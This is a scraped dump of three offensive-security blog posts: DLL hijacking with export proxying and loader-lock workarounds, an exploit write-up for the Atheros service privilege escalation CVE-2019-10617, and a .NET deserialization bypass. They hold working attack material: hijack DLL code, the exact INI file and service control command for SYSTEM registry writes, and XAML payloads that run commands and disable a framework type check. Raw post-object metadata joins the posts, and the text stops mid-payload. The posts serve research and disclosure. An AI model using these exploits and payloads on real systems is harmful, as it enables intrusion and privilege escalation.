Static Sink (IAT)

The most obvious cause for DLL initialization is the result of its inclusion in a dependency graph. Specifically, it’s membership of a required module’s import address table (IAT). This will most likely occur during process initialization (ntdll!LdrpInitializeProcess), but can also occur as a result of dynamic loading.

Here, the subsystem is simply calculating all required dependencies for a particular load event, and sequentially initializing them. However, before passing execution to the new module, its export table will be examined to ensure it provides the expected functionality. This is done by comparing the EAT of the child module and patching those addresses into the IAT of the parent module. A typical call stack looks something like this: 

ntdll!LdrInitializeThunk <- New process starts
ntdll!LdrpInitialize
ntdll!_LdrpInitialize
ntdll!LdrpInitializeProcess
ntdll!LdrpInitializeGraphRecurse <- Dependency graph is built
ntdll!LdrpInitializeNode
ntdll!LdrpCallInitRoutine
evil!DllMain <- Execution is passed to external code

Dynamic Sink (LoadLibrary)

In a similar, but distinctly different process, active code is requesting a new module be initialized without specifying required functions. As a result, ntdll!LdrLoadDll will happily ignore the export table of the target module. This will likely be followed by GetProcAddress in an attempt to identify a particular function for run time use, but not always.

The dependency graph will be calculated with the requested module at its root and load events will occur as described above. This call stack looks something like this:

KernelBase!LoadLibraryExW <- Dynamic module load is requested
ntdll!LdrLoadDll
ntdll!LdrpLoadDll
ntdll!LdrpLoadDllInternal
ntdll!LdrpPrepareModuleForExecution
ntdll!LdrpInitializeGraphRecurse <- Dependency graph is built
ntdll!LdrpInitializeNode
ntdll!LdrpCallInitRoutine
evil!DllMain <- Execution is passed to external code
Takeaway

Hijacks are more complicated to implement when part of a static sink. We need to ensure our export table supplies the required import names of our parent module before we have control over execution. In addition, by the time we have control of execution the addresses in our EAT will have already been patched into the parent module. This complicates any solution which would just rebuild the export table at run time.

Function Proxying

Maintaining stability in our source process demands that we proxy functionality to the real DLL (if there is one). This essentially means, through one means or another, linking our export table to the export table of the real DLL. Game hackers have been using this for a long time, but like hikers and hunters, the knowledge was slow to propagate to network security spheres. Here are some references links that tackle proxying through different methods:

And here are some projects that implement these methods:

These techniques all accomplish the same outcome through slightly different means. Let’s take a quick look at some strategies for better understanding.

Export Forwarding

PE files provide a simple mechanism for redirecting exports to another module. We can take advantage of this and simply point our names at the same export from the real DLL. You can either rename the real file or just use the full path. Most do this using linker directives like so:

// Forwarded exports: each directive makes our export resolve to the matching
// export in the real DLL -- by name ("real.ReadThing"), by ordinal
// ("real.#3"), or via a full path -- so the loader proxies the functionality
// for us at link time.
#pragma comment(linker,"/export:ReadThing=real.ReadThing")
#pragma comment(linker,"/export:WriteThing=real.WriteThing")
#pragma comment(linker,"/export:DeleteThing=real.#3")
#pragma comment(linker,"/export:DoThing=C:\\Windows\\real.DoThing")
// ...

Very easy, and we offload the work to the loader subsystem. It might look a bit obvious that we are attempting a hijack (e.g. every export is forwarded), but the advantage lies in its simplicity. One downside is the requirement to modify source code and/or build processes to prepare a DLL for hijacking, we’ll solve this later.

The traditional format for the module name was *without* the “.dll” extension when defining a forward. Nowadays this doesn’t matter as the LDR subsystem has learned to ignore it. However, older systems like Windows 7 / Server 2008 will still fail if an extension is included. They also might crash when error reporting is attempted due to LdrUnloadDll being called too early.

Stack Patching

An equally elegant, but more dynamic approach is to walk the stack backward from DllMain and replace the return value for the LoadLibrary call above us with a different module handle. As a result, any future calls to lookup functions will simply bypass us completely. It should be no surprise to the reader at this point, but this technique will only work for dynamic sinks. With static sinks, the LDR subsystem has already validated our export table and patched IATs with its values, and it does not care what we have to say about module handles.

Preempt mentions this in a post about Vault 7 techniques, but they don’t go into much detail. Luckily we’re crazy enough to try this stuff, so we’ve written a small PoC which should demo the trick nicely for anyone who wants to run with it.

https://gist.github.com/monoxgas/b8a87bec4c4b51d8ac671c7ff245c812

Run Time Linking

Here we create a hollow list of function pointers, and compile our export table to reference them. The names will be there, but the functions themselves won’t go anywhere useful. When we gain control in DllMain, we load the real DLL dynamically and remap all of the function pointers at run time. This is essentially re-implementing export forwarding…. but with more code. We still have the same disadvantage of modifying source and/or build processes.

; Module-definition (.def) file: each public export name is routed to a
; local assembly wrapper stub rather than a real function body.
EXPORTS

ReadThing=ReadThing_wrapper @1
WriteThing=WriteThing_wrapper @2
DeleteThing=DeleteThing_wrapper @3
.code
; ProcList is a table of function pointers resolved at run time in
; DllMain. Each exported wrapper simply tail-jumps through its slot,
; so callers land in the real DLL's implementation.
extern ProcList:QWORD
ReadThing_wrapper proc
	jmp ProcList[0*8]   ; slot 0: ReadThing
ReadThing_wrapper endp
WriteThing_wrapper proc
	jmp ProcList[1*8]   ; slot 1: WriteThing
WriteThing_wrapper endp
DeleteThing_wrapper proc
	jmp ProcList[2*8]   ; slot 2: DeleteThing
DeleteThing_wrapper endp
// Function-pointer table filled at run time by DllMain; the assembly
// wrapper stubs jmp through these slots into the real DLL.
extern "C" UINT_PTR ProcList[3] = {0};

// Wrapper stubs defined in the accompanying .asm file, one per export.
extern "C" void ReadThing_wrapper();
extern "C" void WriteThing_wrapper();
extern "C" void DeleteThing_wrapper();

// Export names to resolve from the real DLL, in ProcList slot order.
// Fix: the original listing was missing the terminating semicolon
// after the array initializer.
LPCSTR ImportNames[] = {
   "ReadThing",
   "WriteThing",
   "DeleteThing"
};

// DllMain for the run-time-linking proxy: on process attach, load the
// real DLL and resolve each forwarded export into ProcList so the
// assembly wrapper stubs jump into the genuine implementations.
BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
	if (reason != DLL_PROCESS_ATTACH)
		return TRUE;

	// Fix: LoadLibrary returns an HMODULE (not a generic HANDLE), and
	// GetProcAddress returns FARPROC, which must be cast for storage.
	HMODULE real_dll = LoadLibrary( "real.dll" );
	if (real_dll == NULL)
		return FALSE; // real DLL missing: fail the load instead of crashing later

	for ( int i = 0; i < 3; i++ ) {
		ProcList[i] = (UINT_PTR)GetProcAddress(real_dll , ImportNames[i]);
	}

	return TRUE;
}

Run-Time Generation

We could also go crazy and just re-build the entire export address table at run time. Here we need not know what DLL we are going to hijack when we write our code, which is nice. We can also add a basic function which re-implements the Windows search order to try and locate the real DLL dynamically. It could also perform basic alterations like .old and .bak within the current directory just in case.

// Sketch: given our own module handle, locate and load the "real" DLL
// we are impersonating (e.g. by re-walking the Windows search order,
// or trying .old/.bak variants of our own file name).
HMODULE FindModule(HMODULE our_dll)
{
	WCHAR our_name[MAX_PATH];
	GetModuleFileName(our_dll, our_name, MAX_PATH);

	// Locate real DLL using our_name
	// NOTE(review): 'module' is assumed to be produced by the elided
	// lookup above; as written this fragment is illustrative pseudocode
	// and has no explicit return on the fall-through path.

	if (our_dll != module){
		return module;
	}
}

// Sketch: rebuild our export address table at run time so that every
// export resolves into the real DLL located by FindModule.
void ProxyExports(HMODULE module) 
{
	HMODULE real_dll = FindModule(module);

	// Rebuild our export table with real_dll

	return;
}

// Entry point for the run-time-generation approach: kick off export
// proxying exactly once, when the DLL is first mapped into the process.
BOOL WINAPI DllMain(HMODULE module, DWORD reason, LPVOID reserved)
{
	if (reason == DLL_PROCESS_ATTACH)
		ProxyExports(module);

	return TRUE;
}

This strategy, while elegant, suffers from being so dynamic. We no longer include the export names in our static table unless we explicitly add them (re: static sinks). In addition, we receive execution after the import tables (IATs) of other modules might already contain references to our old export table (static sinks again). There is no easy fix for the former that keeps us dynamic unless we simply add every export name we might expect to need across all DLLs. To fix the latter, we need to iterate loaded modules and patch in addresses to the real DLL. Nothing some code can’t solve, but a convoluted solution to some eyes. The bulk of this strategy can be found in the Koppeling project below.

Another caveat is that references to, and within, the export table are relative virtual addresses (RVAs). Because of their size (DWORD), we are limited to placing our new export table somewhere within 4GB of the PE base unless it can fit inside the old one. Not an issue on x86, but certainly on x64.

Takeaway

Export forwarding is the easiest solution when it comes to proxying functionality. It’s preparatory (we need to create the DLL with a specific hijack in mind), but the loader subsystem does the heavy lifting. We can make some nice improvements to the preparation process itself which we’ll look at later. We like the flexibility of run-time generation, but it has weaknesses regarding static-sinks and their requirement for export names to be included in the file on disk. When it comes down to it, we might as well automate export forwarding.

Loader Lock

The LDR subsystem holds a single list of loaded modules for the process. To solve any thread sharing issues, a “loader lock” is implemented to ensure only one thread is ever modifying a module list at one time. This is relevant for hijacking as we typically gain code execution inside DllMain, which occurs while the LDR subsystem is still working on the module list. In other words, ntdll has to pass execution to us while the loader lock is still being held (not ideal). As a consequence, Microsoft provides a big list of things you certainly SHOULD NOT DO while inside DllMain.

  • Call LoadLibrary or LoadLibraryEx (either directly or indirectly). This can cause a deadlock or a crash.
  • Call GetStringTypeA, GetStringTypeEx, or GetStringTypeW (either directly or indirectly). This can cause a deadlock or a crash.
  • Synchronize with other threads. This can cause a deadlock.
  • Acquire a synchronization object that is owned by code that is waiting to acquire the loader lock. This can cause a deadlock.
  • Initialize COM threads by using CoInitializeEx. Under certain conditions, this function can call LoadLibraryEx.
  • Call the registry functions. These functions are implemented in Advapi32.dll. If Advapi32.dll is not initialized before your DLL, the DLL can access uninitialized memory and cause the process to crash.
  • Call CreateProcess. Creating a process can load another DLL.
  • Call ExitThread. Exiting a thread during DLL detach can cause the loader lock to be acquired again, causing a deadlock or a crash.
  • Call CreateThread. Creating a thread can work if you do not synchronize with other threads, but it is risky.
  • Use the memory management function from the dynamic C Run-Time (CRT). If the CRT DLL is not initialized, calls to these functions can cause the process to crash.
  • Call functions in User32.dll or Gdi32.dll. Some functions load another DLL, which may not be initialized.
  • Use managed code.

Scary list, right?

In our experience, however, this list is not as bad as it might appear. For example, LoadLibrary is typically safe to call within DllMain. In fact during static sinks, the loader lock is not re-acquired as long as the same thread is still in initialization. The call to LdrLoadDll will simply re-trigger dependency graph calculation and initialization. Does this mean that Microsoft is wrong to publish the list above? Absolutely not. They are just trying to prevent issues wherever possible.

The real answer to “Can I do <questionable thing> inside DllMain?” is typically “it depends, but avoid trying it”. Let’s check out one example where LDR synchronization can cause a deadlock:

// Worker routine handed to CreateThread. Fix: CreateThread expects an
// LPTHREAD_START_ROUTINE, which is __stdcall, so the WINAPI calling
// convention is required for correctness on x86 builds.
DWORD WINAPI ThreadFunc(PVOID param) {
	printf("[+] New thread started.");
	return 1;
}

// Deliberate demonstration of the loader-lock deadlock: DllMain spawns
// a thread and then blocks on it. The new thread cannot finish
// initializing while this thread holds the loader lock, so both wait
// on each other forever. Do NOT fix -- the deadlock is the point.
BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
	if (reason != DLL_PROCESS_ATTACH)
		return TRUE;

	DWORD dwThread;
	HANDLE hThread = CreateThread(0, 0, ThreadFunc, 0, 0, &dwThread);

	// Deadlock starts here
	WaitForSingleObject(hThread, INFINITE);

	return TRUE;
}

Regardless of the sink we use, our DllMain will get stuck waiting for the new thread to finish, but the new thread will be waiting for us to finish. You can see this in the two call stacks for the threads:

...
ntdll!LdrpCallInitRoutine
Theif!DllMain
KernelBase!WaitForSingleObjectEx
ntdll!NtWaitForSingleObject <- Waiting for the thread
ntdll!LdrInitializeThunk
ntdll!LdrpInitialize
ntdll!_LdrpInitialize
ntdll!NtWaitForSingleObject <- Waiting for LdrpInitCompleteEvent
         (can also be NtDelayExecution/LdrpProcessInitialized != 1)

Inside a dynamic sink, you’ll probably see the deadlock occur in LdrpDrainWorkQueue (as the process has already been initialized by then).

ntdll!LdrInitializeThunk
ntdll!LdrpInitialize
ntdll!_LdrpInitialize
ntdll!LdrpInitializeThread
ntdll!LdrpDrainWorkQueue
ntdll!NtDelayExecution <- Waiting for LdrpWorkCompleteEvent

This outcome is frustrating, because starting a new thread is the easiest way to avoid LDR conflicts. We can collect execution in DllMain, kick off a new thread, and let our malicious code run there once the process has finished initializing. To avoid the deadlock, we could remove the WaitForSingleObject call like so:

// Deadlock-free variant: the thread is created but never waited on
// from DllMain, so the loader lock is released normally.
BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
    if (reason != DLL_PROCESS_ATTACH)
        return TRUE;

    DWORD dwThread;
    HANDLE hThread = CreateThread(0, 0, ThreadFunc, 0, 0, &dwThread);

    // Removed: blocking here under the loader lock deadlocks; the new
    // thread runs after process initialization completes instead.
    // WaitForSingleObject(hThread, INFINITE);

    return TRUE;
}

This works if the process stays up long enough for our code to execute, but this is a rare occurrence. Most likely, we will return execution to the primary module and it will exit quickly or throw an error if we haven’t done proxying properly. Our thread will never get a chance to do anything useful.

Hooking for Stability

Lucky for us, we do hold execution long enough to implement a hook, so we can try to take over primary execution once LDR is done. Where exactly we place this hook is going to depend on where in the execution chain we sit.

  • Pre-Load: The process is still being initialized and execution has not been handed over to the primary module. In this case, we’d likely want to hook the entry point of the primary module.
  • Post-Load: The process has already started core execution, and we might be loaded as a consequence of a LoadLibrary call. The most optimal is to just hook the last function in the call stack which is part of the primary module. Whatever issues/errors bubble up can be ignored then.

To differentiate between these two scenarios we can just keep walking backward in the stack. If we find a return address for the primary module, we are probably post-load. Otherwise, the process likely hasn’t kicked off yet and the entry point is our best bet. Naturally, we’ve built a proof of concept already so you don’t have to pull your hair out:

https://gist.github.com/monoxgas/5027de10caad036c864efb32533202ec

Takeaway

Loader lock represents some challenges, but nothing too difficult as long as we respect it. Starting a separate thread for any significant code is the best option. In situations where we need to keep the process alive so the thread can continue to run, we can use function hooking.

Koppeling

We started this post by introducing various complexities of hijacking. Let’s review and pair them up with relevant solutions:

  1. Stability of the source process: Use function proxying, avoid loader lock.
  2. Maintaining code execution inter-process: Use proxying and/or function hooking.
  3. Complexities of loader lock: Use new threads and/or function hooking.
  4. Static export names: Use post-build cloning, static definitions, linker comments, etc.

If there is one thing to communicate however, the solution space is quite large and everyone will have preferences. Our current “best” implementation combines the simplicity of export forwarding with post-build patching for flexibility. The process goes like this:

  1. We compile/collect our “evil” DLL for hijacking. It doesn’t need to be aware of any hijacking duty (unless you need to add hooking).
  2. We clone the exports of a reference DLL into the “evil” DLL. The “real” DLL is parsed and the export table is duplicated into a new PE section. Export forwarding is used to correctly proxy functionality.
  3. We use the freshly cloned DLL in any hijack. Stability is guaranteed and we can maintain execution inter-process.

We’re releasing a project to demonstrate this, and some other, advanced hijacking techniques called Koppeling. Much like our sRDI project, it allows you to prepare any arbitrary DLL for hijacking provided you know the final path of the reference DLL. We hope you find use for it and contribute if you love hijacking as much as we do.

https://github.com/monoxgas/Koppeling

Wrap Up

Our team is very passionate about not only how to weaponize a technique, but how to do it with stability and poise. We want to avoid impact to customer environments at all costs. This kind of care demands hours of research, testing, and development. Our Slingshot toolkit maintains seamless integration with the techniques we’ve detailed here to ensure our team and others can take full advantage of hijacking. As mentioned earlier, we also dive deeper into these topics in our Dark Side Ops course series if you’re hungry for more.

We hope this post has provided a deeper understanding of this often misrepresented technique. Till next time.

– Nick (@monoxgas)

[post_title] => Adaptive DLL Hijacking [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => adaptive-dll-hijacking [to_ping] => [pinged] => [post_modified] => 2023-04-14 09:26:09 [post_modified_gmt] => 2023-04-14 14:26:09 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=23530 [menu_order] => 525 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [12] => WP_Post Object ( [ID] => 23532 [post_author] => 77 [post_date] => 2019-10-09 07:00:17 [post_date_gmt] => 2019-10-09 12:00:17 [post_content] =>

Discovery

In DbgView one day, I noticed repeated noisy output from a particular process. The pestering output bothered me enough to do some investigating. The offender was C:\Windows\System32\Drivers\AdminService.exe, the binary backing the AtherosSvc Windows service. This is installed as part of the Qualcomm Atheros wireless/bluetooth chip set drivers (QCA61x4 in my case). I began reversing the binary to track down the verbosity and look for security issues while I was at it.

While there were no symbols for the binary, the authors had kindly included so many debug print statements that contextualizing the logic was rather easy. The majority of its code was fairly boilerplate for a Windows service and included some threading, hardware management, and registry management. Initially, I just went hunting for any uses of useful WinAPIs (file management, ACL modification, process handling, token duplication, etc). This led me to an interesting function which appears to perform arbitrary registry work using some INI file contents. It looked something like this:

LPWSTR ini_path[520];
SHGetSpecialFolderPathW(0, &ini_path, 35, 0); // %ProgramData%
wcscpy_s(&ini_path, 260, L"\\Atheros\\AtherosServiceConfig.ini");

LPSTR str_op_type[2];
LPSTR reg_path[260];
GetPrivateProfileStringW(L"AthService", L"regOpType", 0, str_op_type, 2, &ini_path);
GetPrivateProfileStringW(L"AthService", L"regPath", 0, reg_path, 260, &ini_path);

DWORD op_type = convert_to_int(str_op_type);
DWORD top_key = get_top_key_from_path(reg_path);

HANDLE hKey, hSubKey;

if (op_type == 1)
{
    LPSTR reg_value[260];
    GetPrivateProfileStringW(L"AthService", L"regValue", 0, reg_value, 260, &ini_path);
    
    // Delete registry value

} 
else if (op_type == 2)
{
    
    LPSTR reg_value[260];
    LPSTR reg_data[260];
    GetPrivateProfileStringW(L"AthService", L"regValue", 0, reg_value, 260, &ini_path);
    GetPrivateProfileStringW(L"AthService", L"regData", 0, reg_data, 260, &ini_path);

    LPSTR str_reg_type[2];
    GetPrivateProfileStringW(L"AthService", L"regType", 0, str_reg_type, 2, &ini_path);
    DWORD reg_type = convert_to_int(convert_to_int);

    // Create reg value

} 
else if (op_type == 3)
{
    // Delete registry key
}

A quick check on my host showed that, for some reason, C:\ProgramData\Atheros did not exist. ProgramData is writable by any user, so our primitive was looking good. The next challenge was triggering this block of code on demand. I traced back references to the registry function to find a looping ThreadProc function which implemented most of the actual logic for the app.

// Main service worker loop: pumps thread messages and dispatches the
// custom event codes posted by the SCM control handler.
DWORD ThreadProc(PVOID param){
    MSG msg;

    while (true) {
        GetMessageW(&msg, 0i64, 0, 0);

        // Fix: MSG is a struct; the dispatch switches on its message
        // code (the decompiled listing switched on the struct itself).
        switch (msg.message){
            // ...

            case 0x5E62:
                OutputDebugStringW(L"Enter case CUSTOM_THREAD_EVENT_REG_MODIFY!\n");
                do_unsafe_registry_work();
                SetEvent(g_RegEvent); // signal the control handler that the work finished
                break;
        }
    }
}

If we continue following this thread, we discover this thread message code is posted when a specific custom control code is delivered to the service.

// Service control handler: custom control code 133 triggers the
// registry-modification path by posting a thread message to ThreadProc.
DWORD Handler(DWORD dwControl, ...)
{
    switch (dwControl){
        // ...

        case 133:
            // Reset the completion event, ask the worker thread to run
            // the INI-driven registry routine, then wait up to 20s.
            // NOTE(review): dwThread is presumably the worker thread's
            // id captured elsewhere in the binary -- not shown here.
            ResetEvent(g_RegEvent);
            PostThreadMessageW(dwThread, 0x5E62u, 0, 0);
            WaitForSingleObject(g_RegEvent, 20000);
            break;
    }
}

*facepalm*, It really is as easy as that. I’m not sure why this code flow exists, and even more unsure why that directory and INI file are never created.

Exploitation

1 – Create C:\ProgramData\Atheros\AtherosServiceConfig.ini and set its contents to:

[AthService]
regOpType=3
regPath=HKEY_LOCAL_MACHINE\Software
regValue=RuhRoh
regType=1
regData=ThisAintGood

2 – Send the control code to the service

sc control AtherosSvc 133

It’s trivial to stretch full registry control as SYSTEM into privileged code execution, but I’ll leave that as an exercise for the reader.

The Fix

In response to this, it appears Qualcomm have simply removed the registry modification code completely. The ThreadProc case now looks something like this:

// Patched case from the fixed AdminService.exe: the debug print
// remains but the call into the registry routine has been removed.
// NOTE(review): decompiled fragment; the actual binary dispatches on
// msg.message rather than the MSG struct itself.
while (true) {
    GetMessageW(&msg, 0i64, 0, 0);

    switch (msg){
        // ...

        case 0x5E62:
            OutputDebugStringW(L"Enter case CUSTOM_THREAD_EVENT_REG_MODIFY!\n");
            // do_unsafe_registry_work();
            break;
    }
}

Funny enough they left the custom control code (133) hooked up to PostThreadMessage resulting in a useless 20 second wait for g_RegEvent to be reset. Suppose this could be a simple indicator to check for a vulnerable host.

Here are the details for the fixed version (for me anyways):

%SystemRoot%\System32\drivers\AdminService.exe

Version: 10.0.10011.16384
Modified: 08/08/2019
SHA1: 0d21b5fa49ab62b6e8fea82e1da3980092b95c70

Timeline

[9/12/19] – Delivered initial report to product-security@qualcomm.com
[9/12/19] – Received initial ticket creation receipt (QPSIIR-1287)
[9/26/19] – Received notice that this issue was reported in April and was a duplicate report. The original reporter was @DownWithUpSec, and you can find his write-up of the vulnerability here.
[10/07/19] – CVE-2019-10617 is published in the October 2019 Security Bulletin

[post_title] => CVE-2019-10617 – AtherosSvc Registry LPE [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cve-2019-10617 [to_ping] => [pinged] => [post_modified] => 2023-04-14 09:22:33 [post_modified_gmt] => 2023-04-14 14:22:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=23532 [menu_order] => 541 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [13] => WP_Post Object ( [ID] => 23534 [post_author] => 77 [post_date] => 2019-06-04 07:00:48 [post_date_gmt] => 2019-06-04 07:00:48 [post_content] =>

In 2017, James Forshaw released a DotNet deserialization gadget which abuses the ActivitySurrogateSelector class from System.Workflow.ComponentModel. As detailed in his post, this gadget is particularly useful, providing cross-version support and the ability to load arbitrary assemblies into memory (as compared to the common Process.Start technique). However, in newer versions of the DotNet framework (4.8+), this gadget was apparently fixed. We rely on this gadget in some of our stage 0 payloads and were interested in finding a workaround. This is a short post detailing our solution.

The Fix

For those who didn’t read Forshaw’s post (you should), the ActivitySurrogateSelector class unintentionally provides a generic wrapper for typically unserializable classes. This is great for complex gadget design because it means you are no longer limited to types marked as Serializable. The particular chain James created to abuse this behavior is quite amazing, and worth analyzing if you get a chance.

To examine how Microsoft patched this problem, I cracked open a patched copy of the System.Workflow.ComponentModel.dll. Comparing against the previous code, we see that a type check has been added to the GetObjectData function, ensuring that only an ActivityBind or DependencyObject can be wrapped with the surrogate.

// Decompiled from the patched System.Workflow.ComponentModel.dll: the
// ObjectSurrogate now whitelists the only two types it will wrap.
private sealed class ObjectSurrogate : ISerializationSurrogate
{
	public void GetObjectData(object obj, SerializationInfo info, StreamingContext ctx)
	{
		// Unless the (undocumented) opt-out flag is set, reject anything
		// that is not an ActivityBind or a DependencyObject.
		if (!AppSettings.DisableActivitySurrogateSelectorTypeCheck &&
			!(obj is ActivityBind) && !(obj is DependencyObject))
		{
		   throw new ArgumentException("obj");
		}
		// ...
	}
}

As expected, they also added what appears to be a new option (still undocumented) which disables the type check in the off chance that it breaks something. If we trace DisableActivitySurrogateSelectorTypeCheck we also discover a core reason that this gadget, in particular, was likely fixed so quickly.

// Gate for the surrogate type check: the opt-out flag is honored only
// when dynamic code policy (WLDP / Device Guard) is NOT enabled.
internal static bool DisableActivitySurrogateSelectorTypeCheck
{
	get
	{
		// Under dynamic code policy the check can never be disabled.
		if (NativeMethods.IsDynamicCodePolicyEnabled())
			return false;

		AppSettings.EnsureSettingsLoaded();
		return AppSettings.disableActivitySurrogateSelectorTypeCheck;
	}
}

As the gadget can be used to trigger arbitrary assembly loads, a call to IsDynamicCodePolicyEnabled was added to ensure the type white-list is always enforced if WLDP (Device Guard) is enabled. We aren’t concerned with WLDP, therefore we’re left with AppSettings.disableActivitySurrogateSelectorTypeCheck. Underneath this flag maps to ConfigurationManager.AppSettings which typically refers to policies in an app or web.config file.

// The flag maps straight onto ConfigurationManager.AppSettings,
// normally sourced from an app.config/web.config file.
// Fixes vs. the original listing: the collection type is
// NameValueCollection, and the statement needs a terminating semicolon.
NameValueCollection collection = ConfigurationManager.AppSettings;

bool.TryParse(
collection["microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck"],
out AppSettings.disableActivitySurrogateSelectorTypeCheck
);

So we just need a way to configure a setting for an application we don’t control, which is actually easier than you might think. See, ActivitySurrogateSelector was fixed, but many other DotNet gadgets are still in working order. Most of them, implemented in ysoserial.net, are configured to execute Process.Start with a target command line. Re-purposing them to instantiate a class from an arbitrary assembly would take serious wizardry, but luckily we only need them to do one thing: disable the type check.

Retooling

The newest kid on the gadget block is TextFormattingRunProperties, discovered by Oleksandr Mirosh. Like many other gadgets, it relies on having controlled input to a XamlReader.Parse call. The core exploitation of this input depends on the ObjectDataProvider element. These are typically used to connect UI elements (TextBox/ComboBox) to custom objects or code. These objects and their capabilities are fascinating in their own right, and worth additional research. The typical template for a Process.Start call looks something like this:

<!-- Classic ObjectDataProvider payload: Process.Start("cmd", "/c calc")
     runs as a side effect of XAML parsing. Fix: XAML namespace URIs are
     literal identifiers and must use the canonical http:// scheme, or
     XamlReader.Parse will not recognize them. -->
<ResourceDictionary
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:System="clr-namespace:System;assembly=mscorlib"
        xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">
     <ObjectDataProvider x:Key="Calc" ObjectType = "{x:Type Diag:Process}" MethodName = "Start" >
     <ObjectDataProvider.MethodParameters>
        <System:String>cmd</System:String>
        <System:String>/c calc </System:String>
     </ObjectDataProvider.MethodParameters>
    </ObjectDataProvider>
</ResourceDictionary>

As the XML is parsed, the ObjectDataProvider object is created, and the target method is immediately executed to prepare results. To re-use this, we’ll need to somehow connect an ObjectDataProvider entry to AppSettings.disableActivitySurrogateSelectorTypeCheck. To start, I came up with the following C# code to disable the type check:

// Goal expressed in C#: flip the undocumented app setting that
// disables the ObjectSurrogate type check.
ConfigurationManager.AppSettings.Set(
	"microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck",
	"true"
);

To reproduce this code with XAML input, we’ll actually need two ObjectDataProvider objects. This is because AppSettings is retrieved from the static ConfigurationManager class, followed by the instance method Set(). We can replace ObjectType with ObjectInstance to get this sequential behavior. Also worth noting that because of overrides, the Add() method of AppSettings will throw an exception, but Set works just fine for us.

<!-- Two chained ObjectDataProviders: the first fetches the static
     ConfigurationManager.AppSettings instance, the second calls Set()
     on it to flip the type-check flag. Fix: XAML namespace URIs must
     use the canonical http:// scheme to be recognized by the parser. -->
<ResourceDictionary
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:System="clr-namespace:System;assembly=mscorlib"
        xmlns:Config="clr-namespace:System.Configuration;assembly=System.Configuration">
    <ObjectDataProvider x:Key="appSettings" ObjectType = "{x:Type Config:ConfigurationManager}" MethodName = "get_AppSettings" ></ObjectDataProvider>
    <ObjectDataProvider x:Key="setMethod" ObjectInstance = "{StaticResource appSettings}" MethodName = "Set" >
        <ObjectDataProvider.MethodParameters>
            <System:String>microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck</System:String>
            <System:String>true</System:String>
        </ObjectDataProvider.MethodParameters>
    </ObjectDataProvider>
</ResourceDictionary>

Now that we have a payload for disabling the type check, we just need to execute it before our original ActivitySurrogateSelector gadget. We could obviously do this manually through whichever entry vector we have. The setting should be persistent during the life of an app instance, so sending the disable payload once would suffice for most scenarios.

Update: After additional testing, I discovered the technique of stacking objects in a list won’t work. This is because an exception is thrown while deserializing the first object, causing the second object to never be touched.

// Wrap the disabling XAML in the TextFormattingRunProperties gadget so
// it is parsed (and the setting flipped) during deserialization.
string disable_xaml = @"...";

TextFormattingRunPropertiesMarshal disable_payload = 
    new TextFormattingRunPropertiesMarshal(disable_xaml);

List<Object> object_group = new List<Object>();

// NOTE (per the update above): stacking both payloads in one list does
// NOT work in practice -- the first object's deserialization throws
// before the second is ever reached.
object_group.Add(original_payload);
object_group.Add(disable_payload);

return Serialize(object_group, ...)

Wrapping Up

Fixing only one of the available gadgets, but leaving the rest, is a recipe for disaster. Depending on your motivation, many of the existing gadgets can be retooled for interesting purposes beyond starting a process. I just really liked ActivitySurrogateSelector and wanted to keep it around.

I’ve submitted a PR for ysoserial.net to support this new bypass.

– Nick (@monoxgas)

Update – 6/6/19

After some additional work on the gadget, some changes have been made to support more scenarios.

The reference made to ConfigurationManager.AppSettings only occurs if the internal Workflow.ComponentModel.AppSettings has not yet been initialized:

// Workflow's internal AppSettings reads the global config only once;
// after settingsInitialized is set, later config changes are ignored.
if (!AppSettings.settingsInitialized)
{
    ... // Read in values from the global config

    AppSettings.settingsInitialized = true;
}

Therefore if the disableTypeCheck flag has ever been queried before, our original payload will make no difference. To fix this, I’ve added some System.Reflection calls using ObjectDataProviders to manually set the internal Workflow boolean value. In addition, I found a slightly simpler way to access the static ConfigurationManager.AppSettings class.

<!-- Updated payload: uses reflection (Type.GetType -> GetField ->
     SetValue) to force Workflow's internal boolean directly, plus the
     simpler x:Static path to ConfigurationManager.AppSettings. Fix:
     XAML namespace URIs must use the canonical http:// scheme. -->
<ResourceDictionary
    xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
    xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
    xmlns:s="clr-namespace:System;assembly=mscorlib"
    xmlns:c="clr-namespace:System.Configuration;assembly=System.Configuration"
    xmlns:r="clr-namespace:System.Reflection;assembly=mscorlib">
    <ObjectDataProvider x:Key="type" ObjectType="{x:Type s:Type}" MethodName="GetType">
        <ObjectDataProvider.MethodParameters>
            <s:String>System.Workflow.ComponentModel.AppSettings, System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35</s:String>
        </ObjectDataProvider.MethodParameters>
    </ObjectDataProvider>
    <ObjectDataProvider x:Key="field" ObjectInstance="{StaticResource type}" MethodName="GetField">
        <ObjectDataProvider.MethodParameters>
            <s:String>disableActivitySurrogateSelectorTypeCheck</s:String>
            <r:BindingFlags>40</r:BindingFlags>
        </ObjectDataProvider.MethodParameters>
    </ObjectDataProvider>
    <ObjectDataProvider x:Key="set" ObjectInstance="{StaticResource field}" MethodName="SetValue">
        <ObjectDataProvider.MethodParameters>
            <s:Object/>
            <s:Boolean>true</s:Boolean>
        </ObjectDataProvider.MethodParameters>
    </ObjectDataProvider>
